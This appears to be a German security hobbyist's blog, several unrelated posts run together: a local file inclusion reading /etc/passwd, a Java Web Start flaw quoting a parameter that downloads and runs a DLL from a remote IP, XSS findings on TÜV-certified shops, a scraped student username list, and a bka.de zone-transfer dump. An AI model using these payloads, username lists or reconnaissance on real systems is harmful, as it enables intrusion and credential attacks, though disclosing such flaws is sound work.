Ich habe schon viele gute Bewerbungen erhalten, aber sie waren alle nichts gegen den Kerl, der heute morgen per Email hereingeflogen kam. Die Eckdaten waren schonmal vielversprechend:

• 12+ years PHP experience
• 8+ years Perl experience
• sehr ansprechender Stundenlohn

Das klingt nach einem Perl-Guru, der dann auf PHP umgesattelt ist, nicht wahr?

Es wurden zwei PHP-Projekte zur Referenz angeboten, direkt mal angeschaut und vom Stuhl gefallen. Der Grund ist nicht wirklich schwer zu finden, die URL sah wie folgt aus:

http://XXXXXXXXXXXX.com/?main=pce/index.php

Für die Personen die spätestens jetzt total verwirrt sind: Der Homepage wird hinter dem ? der Variable main die Adresse zu einem PHP-Script zugewiesen (und zwar pce/index.php).

Wenn man also den Inhalt von main entsprechend verändert, kann man beliebige Dateien des Servers anzeigen. Beispiel:

So können wir die Datei /etc/passwd auslesen, in der Informationen über die Benutzeraccounts eines Linux-Systems gespeichert sind. Natürlich ist jetzt auch nicht mehr weit bis zu einem erfolgreichen Hack, aber darum geht es an dieser Stelle auch nicht.

Es gab noch einige weitere Sicherheitslücken in seinen Referenzprojekten, und nett wie ich bin habe ich sie ihm natürlich auch sofort mitgeteilt.

Den Job wird er aber nicht bekommen und hiermit verabschiede ich mich, sprachlos.

Bei der Sicherheitslücke handelt sich um eine Command Execution Vulnerability die durch unterlassenes Überprüfen der Aufrufparameter von javaws.exe entstanden ist. Wenn ein bei der Einbindung von Java-Applets angegebener Parameter in der Form vom " -XXaltjvm="\\12.34.56.78\virus.dll vorliegt, wird von dem Java Runtime Environment die Datei unter \\12.34.56.78\virus.dll heruntergeladen und ausgeführt. Ooops!

Der folgende Codeschnipsel dürfte genügend Aufschluss über die Einbindung der betroffenen Parameter docbase und launchjlnp geben.

1
2
3
4
5
6
7
8
9
10

if (browser == 'MSIE') {
	document.write('<' + 'object classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" '
		+ 'width="0" height="0">' + '<' + 'PARAM name="launchjnlp" value="' + jnlp + '"' + '>'
		+ '<' + 'PARAM name="docbase" value="' + jnlpDocbase + '"' + '>'
		+ '<' + '/' + 'object' + '>');
} else if (browser == 'Netscape Family') {
	document.write('<' + 'embed type="application/x-java-applet;jpi-version='
		+ deployJava.firefoxJavaVersion + '" ' + 'width="0" height="0" '
		+ 'launchjnlp="' +  jnlp + '"' + 'docbase="' +  jnlpDocbase + '"' +	' />');
}

Bis zu einem Schließen dieser Sicherheitslücke sollte jeder im Browser Java ausstellen.

Vom Aufspüren von versteckten Daten über Dateianalyse bis hin zur Abwehr von Computerforensik ist dort jeder Themenbereich der IT-Forensik mit aufschlussreichen Artikeln abgedeckt. Vor allem die Netzwerkforensik (link) ist meiner Meinung nach ein hochinteressantes Thema.

Ich hoffe, dieses Thema wird nun noch weitere Fans finden!

Update: Antwort bereits eingetroffen, sie arbeiten an einem Fix. Nett.

Update: Und jetzt gibt es auch WordPress 2.8.6, alle schön updaten!

Anmerkung: Diese Story ist nicht als Eigenwerbung gedacht, und es würde mir sehr leid tun, wenn es so rüberkommt. Die ganze Sache hat mich rein privat verfolgt und ich beschloss mal einen Blick drauf zu werfen!

Als ich heute Mittag auf Fefe’s Blog über den Libri-Datenskandal im Bezug auf das Homepage-Sicherheitssigel des TÜV SÜD gelesen habe, war für mich eines sofort klar:

Mein Softwareprojekt wird an diesem Freitagmittag keine großen Sprünge mehr machen, und ich werde diesem ominösen, aber auch sehr seriös anmutenden Sicherheitssiegel auf den Zahn fühlen!

Gesagt, getan. Die Homepage des TÜV SÜD zu diesem lukrativen Geschäftsfeld zeigt ein mit McAfee SECURE – vormals HackerSafe – vergleichbares Geschäftskonzept auf: Man zahle für eine Sicherheitsüberprüfung der Homepage, dann darf man sich mit einem kleinen Bild schmücken das Sicherheit suggeriert.

Schon bei HackerSafe gab es harsche Kritik wegen der allzu bereitwilligen Vergabe des Prädikats “Dies ist eine sichere Webseite, gib uns all deine Daten”, und die wird es nach Lektüre dieses Beitrags verdientermaßen auch beim TÜV SÜD geben.

.. also nahm ich kurzfristig einige Stichproben aus den Referenzkunden unter die Lupe; ein kurzer Test auf XSS und SQL-Injection, das übliche eben.

Auf der Hälfte der von mir “überprüften” Seiten existieren Sicherheitslücken.

• Audible.de
• Borromedien.de
• ReifenDirekt.de
• weg.de
• .. und sogar auf safer-shopping.de, der TÜV-eigenen Seite !!!

Welche Art von Sicherheitslücken?

Die Sicherheitslücken wurden durch Screenshots dokumentiert, um die angesprochenen Webseiten nicht in Verlegenheit zu bringen. Sie sind aber allesamt auch von einem 16jährigen mit etwas Fleiß auffindbar. Und auch wenn es sich nur um Cross-Site Scripting (XSS) handelt, kann man damit von Session-Hijacking über Phishing bis zu einem XSS-Wurm viele lustige Sachen machen. Vor allem mit einem vertrauenserweckenden https:// in der Adresse!

Audible.de Sicherheitslücke

Audible.de Sicherheitslücke: Die Banane tanzt.

Auf Audible.de ist das TÜV SÜD Sicherheitssiegel ziemlich versteckt am Rand der Homepage unten links angebracht. Die Seite erscheint auch sehr solide, jedenfalls bis man sich etwas tiefer in die Archive eingräbt, und sie funktioniert auch mit einem https:// am Anfang der URL. Feine Sache!

Borromedien.de Sicherheitslücke

Borromedien XSS Sicherheitslücke

Ein weiter Bücherversand, von dem ich vorher noch nie gehört habe. Das TÜV-Siegel ist eindrucksvoll unter dem Login-Feld angebracht, und in dessen direktem Umfeld tritt ironischerweise eine Cross-Site Scripting Lücke auf. Ich hätte gerne ein schöneres Fundstück auf Borromedien präsentiert, aber der Programmierer hat scheinbar einen Sinn für Humor!

ReifenDirekt.de / delti.com Sicherheitslücke

ReifenDirekt.de Sicherheitslücke mit SSL-Unterstützung. Auf die Sache mit der Banane bin ich immernoch stolz!

Reifendirekt.de ist ein sehr guter und auch preiswerter Reifenversand, ich habe dort letzt erst Sommerreifen gekauft. Leider läuft die ganze Seite über https://, und da macht sich eine XSS-Lücke leider nicht gut. Das TÜV-Siegel haben sie zum Glück aber schon mal in Richtung Seitenende verschoben. Die Lücke gibts umsonst

weg.de Sicherheitslücke

weg.de Sicherheitslücke, wenn auch nur auf optionaler Domain. Banana's still dancing!

Weg.de hat es schon ein bisschen schwerer gemacht. Aber es ist natürlich logisch dass Benutzerinput gut gefiltert wird, wenn die Software den ganzen Tag Suchanfragen nach nettem Urlaub parsen muss.

Das ist nun nicht ganz weg.de sondern cardelmar.de, aber afaik benutzen die nur eine eigene Domain für eine bestimmte Urlaubskategorie. Auf ein paar anderen zur Seite gehörenden Domains bröckelt es auch ein bisschen..

TÜV SÜD (safer-shopping.de) Sicherheitslücke

Safer-Shopping.de Sicherheitslücke (TÜV SÜD). Jetzt hat sich die Banane eingebrannt, nicht wahr?

.. last but not least gibt es auf der Sicherheits-Homepage des TÜV SÜD eine nette Sicherheitslücke. Mit SSL.

Damit verliert die ganze Sache mit dem Sicherheitssiegel leider enorm an Glaubwürdigkeit, wenn der einzige Punkt im Programm, an dem ein String als Parameter akzeptiert wird die Filterung nicht richtig hinbekommt.

Dies sind die Momente, die das Leben wieder lebenswert machen

Fazit

Bis auf große Versicherungsgesellschaften wie AXA, HanseMerkur und Karstadt-Quelle Versicherungen, sind die vom TÜV SÜD für besondere Homepagesicherheit zertifizierten Webshops kein Deut sicherer als andere Seiten.

Selbst ohne Benutzerkonto präsentieren sie bösartigen Personen genügend Angriffsfläche für allerlei Sachen die am Ende die Kunden ausbaden müssen. Unter einer Sicherheitszertifizierung hätte ich mir zumindest einen groben Penetrationtest vorgestellt, der bei den aufgezeigten Homepages mit großer Wahrscheinlichkeit nicht durchgeführt wurde, da selbst ein Wald-und-Wiesen-Hacker wie ich Erfolg hatte.

Zum Nachdenken: Für diesen Report habe ich inkl. Artikelschreiben ca. 3 Stunden benötigt, für ein kommerzielles Siegel kann man doch wohl einen Studenten kurz drüberschauen lassen, oder?

Anmerkungen

Falls Sie mit einer der angesprochenen Webseiten etwas am Hut haben, so schreiben sie mich an und ich zeige ihnen gerne den genauen Ort der Sicherheitslücken, damit die Sache möglichst schnell aus der Welt geschafft ist. Kontaktmöglichkeiten siehe Impressum.

EDIT: Da ich jetzt schon darauf angesprochen wurde: Ja, die Sicherheitslücken wurden den jeweiligen Homepages natürlich sofort auf verschiedenen Wegen mitgeteilt. Mit dem Aufruf zur Kontaktaufnahme in diesem Blogpost wollte ich nur die Sysadmins erreichen, die man eher auf Heise als im Kundensupport findet. Wenn ein Unternehmen erstmal die Alexa-5000 “Schallmauer” durchbrochen hat, dann dauert es manchmal länger, bis das Supportticket den richtigen Bearbeiter findet, als wenn der IT-ler eines Unternehmens die Sache sowieso in den News liest und sich nicht an mich herantraut.

Falls jemandem von den Quadratwurzeln meine 2 Cents gefallen hat so möge er sich doch bitte bei mir melden. Schon erledigt, dankeschön!

Alle Rechtschreibfehler dürfen behalten werden, ich genieße ab sofort meinen Freitag Abend!

The following SEO Black Hat Forum members have been hand selected to get a free Invite to SEO de Janeiro (a 5000 euro value!) based on their ongoing helpful contributions:

Gotan Raider
Insomniac
countzero
markus
Paladin
alexf2000
Brad101
stefanjuhl
alf
smaxor
Cygnus

Laut dem Guide zur Veranstaltung soll es diesmal neben den versprochenen 30 brasilianischen Models auch Hang Gliding, Jetski und Kajakfahren UND sogar einige kleinere Alkoholfreie Drinks geben

Natürlich wird es bestimmt auch sehr nett, den ganzen Nicknames ein Gesicht zuzuordnen, und bei 5000 Euro Startgeld – oder in meinem Fall etwas in der Community Partizipieren – bin ich mir sicher, dass auch Leute kommen von denen selbst ich *hust* noch was lernen kann.

Diese kleine Party soll also übers Wochenende vom 20. bis zum 23. Februar in Rio de Janeiro starten, und ich plane eigentlich, von Frankfurt aus zu fliegen. Wer von euch ist denn auch bei der SEO de Janeiro dabei? Es wäre echt toll, wenn man durch ein wenig Koordination auf einmal nebeneinander im Flugzeug sitzt oder gar das gleiche Hotel gebucht hat

Natürlich werde ich für mich, meine liebenswerten Mitmenschen und vor allem für dich, meinen treuen Leser, der natürlich nicht weniger liebenswert ist, alles so gut wie möglich auf Speicherkarten bannen. Ist ja für mich immerhin die erste Reise nach Südamerika, hey ho lets go!!

Der ganze Fusel wurde also heruntergeladen und durch

grep -v ^# students.txt | sed -e “s/\s\+//g;s/\.-\(.*\)//g;s/[^A-Za-z]//g” | grep -v “^$” | awk ‘{if (length($0) > 4 && length($0) < 13) print $0 }’ | uniq

in ein brauchbares Format gebracht, vielleicht kann das ja der ein oder andere außer mir gebrauchen.

Ich war so frei diese Userliste auf den Namen Uni Göttingen Studenten-Userlist zu taufen. )

Gut, ein geglückter Zone Transfer ist keine Meisterleistung, und mit den Informationen kann man auch nicht mehr anfangen, als einen Blogpost zu schreiben, aber ich vermute dass hashdb.bka.de (193.175.83.72) noch einigen Menschen negativ in Erfahrung bleiben wird.

Von außen ist der Host leider nicht erreichbar, ich befürchte das macht mich aber nur noch neugieriger als zuvor *verschwörungsuch* )

Anbei die vollständigen Ergebnisse des Scans, etwas anonymisiert weil ein miskonfigurierter DNS ja in den besten Häusern vorkommen soll.

bka.de. 7200 IN SOA dns.xxxxx.de. hostmaster.xxxxx.de. (
2008091700 ; Serial
86400 ; Refresh
7200 ; Retry
604800 ; Expire
7200 ) ; Minimum TTL
bka.de. 7200 IN NS dns.xxxxx.de.
bka.de. 7200 IN NS secondary.xxxxx.de.
bka.de. 7200 IN NS secondary.xxxxx.de.
bka.de. 7200 IN A 62.156.153.38
bka.de. 7200 IN MX 100 smtp.ts-businessmail.de.
bka.de. 7200 IN TXT “Created by update.named 3.6a”
oa.bka.de. 7200 IN A 62.156.153.38
oa.bka.de. 7200 IN MX 100 smtp.ts-businessmail.de.
www.infopool-polizeikonzepte.bka.de. 7200 IN A 77.87.229.218
iuk.bka.de. 7200 IN A 62.156.153.38
iuk.bka.de. 7200 IN MX 100 smtp.ts-businessmail.de.
www.bka.de. 7200 IN A 62.156.153.38
hashdb.bka.de. 7200 IN A 193.175.83.72
st.bka.de. 7200 IN A 62.156.153.38
st.bka.de. 7200 IN MX 100 smtp.ts-businessmail.de.
infodok.bka.de. 7200 IN A 77.87.229.206
*.bka.de. 7200 IN MX 100 smtp.ts-businessmail.de.
tesit.bka.de. 7200 IN A 62.156.153.38
tesit.bka.de. 7200 IN MX 100 smtp.ts-businessmail.de.